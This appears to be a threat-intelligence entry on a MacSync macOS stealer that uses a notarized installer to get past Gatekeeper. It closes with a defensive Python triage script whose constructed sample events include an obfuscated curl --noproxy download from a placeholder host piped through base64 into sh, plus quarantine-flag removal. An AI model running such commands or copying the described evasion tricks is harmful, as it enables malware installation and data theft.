New MacSync macOS Stealer Uses Signed App to Bypass Apple Gatekeeper
Cybersecurity researchers have discovered a new variant of a macOS information stealer called MacSync that's delivered by means of a digitally signed, notarized Swift application masquerading as a messaging app installer to bypass Apple's Gatekeeper checks. "Unlike earlier MacSync Stealer variants that primarily rely on drag-to-terminal or ClickFix-style techniques, this sample adopts a more
AI Analysis
Technical Summary
This MacSync variant changes how the stealer reaches the endpoint rather than what it steals. Earlier versions depended on the victim doing the work, either by dragging a command into Terminal or through ClickFix-style social engineering, where a fake error or verification page tells the user to paste a command into Terminal. This sample instead ships as a Swift application that is code-signed with a Developer ID certificate and notarized by Apple, packaged inside a disk image named "zk-call-messenger-installer-3.9.2-lts.dmg" and hosted on an attacker-controlled domain. Because the app is notarized, Gatekeeper treats it as approved software and shows only the routine "downloaded from the internet" prompt instead of a block; the notarization service's own malware scan and XProtect's signature-based checks did not flag it either, so none of the default protections intervene. The installer additionally tells the user to right-click the app and choose Open, the standard user override for Gatekeeper's warning on software it has not approved, which keeps the lure working even if the app fails a check on a given machine.

Once running, the Swift dropper performs several checks before it fetches anything: it verifies internet connectivity, enforces a minimum one-hour interval between executions (so repeated detonations in a sandbox or by an analyst do not produce fresh network activity), and removes the com.apple.quarantine extended attribute from the files it handles so that macOS raises no further prompts. The payload is retrieved with a curl command whose flags are split apart in the embedded command string, a departure from the usual invocation that sidesteps static detections written for the common form, and which passes --noproxy so the download ignores any proxy configured for curl and the inspection attached to it. The DMG is padded to 25.5 MB with unrelated PDFs, most plausibly to exceed the size limits at which some scanners and sandboxes skip or truncate analysis.

The Base64-encoded payload is MacSync itself, a rebranding of the Mac.c stealer first seen in April 2025. It carries a Go-based agent that exfiltrates data from the host and takes commands from the operators, so an infection is both a data theft and a remote-access foothold. Apple has since revoked the signing certificate, which makes Gatekeeper block this particular binary on systems that receive the revocation, but the campaign fits a wider pattern in which macOS stealers obtain legitimate signing and notarization to look trustworthy; Odyssey and DigitStealer have used the same approach, although some stealers still ship in unsigned disk images.
The practical consequence is that a valid signature and notarization ticket no longer separate this installer from legitimate software. Detection has to rest on what the process does after launch, and on users who recognise a deceptive installer when they see one.
Potential Impact
For European organizations the threat is first to the confidentiality of data held on macOS endpoints, and second to the integrity of anything the remote agent can reach. Because the installer passes Gatekeeper and XProtect, the controls most organizations rely on by default will not stop it: a user who accepts the lure is infected. Organizations that use Macs for sensitive communications, intellectual property or personal data processing face data theft, the breach-notification and GDPR obligations that follow, and the operational disruption of a response. The Go-based agent's command-and-control channel lets the operators run further commands on the host, and the credentials and session data a stealer collects are the usual starting point for follow-on intrusion into an organization's cloud and identity systems, which is how a single infected laptop turns into a wider compromise. The messaging-app lure makes sectors that install many third-party communication tools, such as finance, legal and media, natural targets. The execution rate limit, padded disk image and obfuscated curl invocation are aimed at sandboxes and static scanners and slow down triage. Finally, the abuse of a valid Developer ID certificate and of notarization erodes the assurance those mechanisms are meant to give users, who are taught that a notarized app is safe to open.
Mitigation Recommendations
European organizations should layer controls that do not depend on the signature check this sample defeats. Enforce application allowlisting on managed Macs with a tool built on Apple's Endpoint Security framework (Google's open-source Santa, or the allowlisting feature of a commercial EDR), with rules keyed on Team ID or binary hash rather than the mere presence of a valid signature, so that a freshly issued Developer ID certificate does not automatically grant execution. Have the EDR alert on the behaviours described above: a child of a notarized app removing com.apple.quarantine (via xattr -d or the underlying removexattr call), a shell launched from an application executing directly off a mounted disk image under /Volumes, and a curl invocation that passes --noproxy or pipes a base64-decoded payload into a shell.

Monitor egress for connections to the domain used in this campaign ("zkcall[.]net") and, more durably, for curl downloads from hosts that no approved application talks to. Note that --noproxy means the traffic appears on the egress path rather than at the proxy, so proxy logs alone will miss it. Train users to install messaging software only from the vendor's site or an internal catalogue, and to treat any installer that tells them to right-click and Open, or to paste a command into Terminal, as a red flag. Keep macOS current: Apple distributes XProtect updates separately from OS releases and Gatekeeper checks certificate revocation online, so the revoked certificate only protects machines that are online and up to date.

When triaging a suspicious download on a Mac, codesign -dv --verbose=4 shows the signing authority and Team ID, spctl --assess --type execute -vv shows Gatekeeper's current verdict (including a revoked certificate), and xattr -p com.apple.quarantine shows whether the quarantine flag is still present on the file. Audit the Downloads folders and mounted images of managed Macs for disk images whose size is out of proportion to the application they contain. Finally, maintain a macOS-specific incident response playbook: isolate the host, collect the unified log and EDR telemetry, establish what the agent exfiltrated, and rotate every credential and session token the user held on the machine.
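The behaviours listed in the Technical Summary and the alerting recommended above can be turned into a small triage routine. The following is an added example, not code from the article, from Apple, or from the malware: it runs a few behavioural rules over process-execution events and scores each process tree. The event schema is an assumption (one JSON object per line, loosely modelled on what an Endpoint Security based EDR records for exec events), and every sample event, pid, path and example.invalid URL is constructed for illustration.

```python
"""Behavioural triage of macOS process-execution events for the dropper pattern
described above: quarantine-flag removal, an obfuscated curl with --noproxy, a
base64 payload piped into a shell, and a notarized app executing straight off a
mounted disk image.

Added example, not code from the article, Apple, or the malware. The event schema
is an ASSUMPTION (one JSON object per line, modelled loosely on an Endpoint
Security based EDR's exec events); all sample events below are CONSTRUCTED."""
import json
import re
from collections import defaultdict

SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}

# Constructed telemetry. pid 620 stands in for a Developer ID-signed, notarized
# installer launched from a mounted DMG; pid 700 is a notarized terminal emulator
# a developer uses for a legitimate (if risky) curl | bash install.
SAMPLE_EVENTS = """
{"ts":"2025-12-20T10:00:00Z","pid":501,"ppid":1,"path":"/Applications/Safari.app/Contents/MacOS/Safari","args":["Safari"],"signer_type":"apple","notarized":false}
{"ts":"2025-12-20T10:05:10Z","pid":620,"ppid":1,"path":"/Volumes/zk-call-messenger-installer/Installer.app/Contents/MacOS/Installer","args":["Installer"],"signer_type":"developer_id","notarized":true}
{"ts":"2025-12-20T10:05:11Z","pid":621,"ppid":620,"path":"/usr/bin/xattr","args":["xattr","-d","com.apple.quarantine","/Users/u/Downloads/zk-call-messenger-installer-3.9.2-lts.dmg"],"signer_type":"apple","notarized":false}
{"ts":"2025-12-20T10:05:12Z","pid":622,"ppid":620,"path":"/bin/sh","args":["sh","-c","cu''rl -s -L --noproxy '*' https://example.invalid/p -o /tmp/.p && base64 -d /tmp/.p | sh"],"signer_type":"apple","notarized":false}
{"ts":"2025-12-20T11:00:00Z","pid":700,"ppid":1,"path":"/Applications/iTerm.app/Contents/MacOS/iTerm2","args":["iTerm2"],"signer_type":"developer_id","notarized":true}
{"ts":"2025-12-20T11:00:05Z","pid":701,"ppid":700,"path":"/bin/zsh","args":["zsh","-c","curl -fsSL https://example.invalid/install.sh | bash"],"signer_type":"apple","notarized":false}
{"ts":"2025-12-20T11:00:09Z","pid":702,"ppid":700,"path":"/usr/bin/xattr","args":["xattr","-l","/Users/u/Downloads/notes.dmg"],"signer_type":"apple","notarized":false}
"""


def normalize_cmdline(cmd: str) -> str:
    # Undo cheap word-splitting tricks that defeat a naive 'curl' string match:
    # empty quote pairs (cu''rl), a quote between word characters (c"u"rl) and a
    # backslash before a letter (cu\rl). A POSIX shell resolves each to 'curl'.
    s = cmd.replace("''", "").replace('""', "")
    s = re.sub(r'''(?<=\w)["'](?=\w)''', "", s)
    s = re.sub(r"\\(?=[A-Za-z])", "", s)
    return s


def match_rules(e, parent):
    """Rule names triggered by one event, given its parent event (or None)."""
    hits = []
    args = e.get("args", [])
    raw = " ".join(args)
    norm = normalize_cmdline(raw)

    # xattr -d / -dr / -c on com.apple.quarantine: clearing the quarantine flag.
    if e["path"].endswith("/xattr") and "com.apple.quarantine" in args \
            and any(a.startswith(("-d", "-c")) for a in args[1:]):
        hits.append("quarantine_removal")

    if re.search(r"\bcurl\b", norm):
        if norm != raw:                 # 'curl' only visible after de-obfuscation
            hits.append("obfuscated_command_word")
        if "--noproxy" in norm:         # download deliberately routed around the proxy
            hits.append("curl_noproxy")
        if re.search(r"base64\s+(-d|-D|--decode)\b.*\|\s*(sh|bash|zsh)\b", norm) \
                or re.search(r"\bcurl\b[^|]*\|\s*(sh|bash|zsh)\b", norm):
            hits.append("download_to_shell")

    # A shell child of a notarized, Developer ID-signed app that is executing
    # straight off a mounted disk image rather than from /Applications.
    if e["path"] in SHELLS and parent is not None and parent.get("notarized") \
            and parent.get("signer_type") == "developer_id" \
            and parent["path"].startswith("/Volumes/"):
        hits.append("notarized_dmg_app_spawns_shell")
    return hits


def triage(lines: str):
    """Map the pid at the top of each process tree to the sorted rules it tripped."""
    events = [json.loads(l) for l in lines.strip().splitlines() if l.strip()]
    by_pid = {e["pid"]: e for e in events}

    def root_of(e):
        while e["ppid"] in by_pid:      # walk up as far as the telemetry reaches
            e = by_pid[e["ppid"]]
        return e

    hits = defaultdict(set)
    for e in events:
        for rule in match_rules(e, by_pid.get(e["ppid"])):
            hits[root_of(e)["pid"]].add(rule)
    return {pid: sorted(rules) for pid, rules in hits.items()}


def verdict(rules):
    """One curl | sh alone is noisy (developers do it); several of these behaviours
    from a single process tree is the dropper pattern."""
    if len(rules) >= 3 or {"quarantine_removal", "curl_noproxy"} <= set(rules):
        return "likely_dropper"
    return "review" if rules else "clean"


if __name__ == "__main__":
    for pid, rules in sorted(triage(SAMPLE_EVENTS).items()):
        print(pid, verdict(rules), ", ".join(rules))
```

Two caveats. A Swift dropper can call removexattr directly instead of spawning /usr/bin/xattr, so in production the quarantine rule should also consume the EDR's extended-attribute deletion events, not only exec events. The one-hour execution interval is not modelled here; it is an anti-analysis delay rather than a signal you can match on a single event.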
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Switzerland, Belgium, Ireland
Technical Details
- Article Source: https://thehackernews.com/2025/12/new-macsync-macos-stealer-uses-signed.html (fetched 2025-12-24T18:22:55Z, 1,042 words)
Threat ID: 694c2f82484fa739dbdb4e90
Added to database: 12/24/2025, 6:22:58 PM
Last enriched: 12/24/2025, 6:23:13 PM
Last updated: 12/25/2025, 8:58:22 AM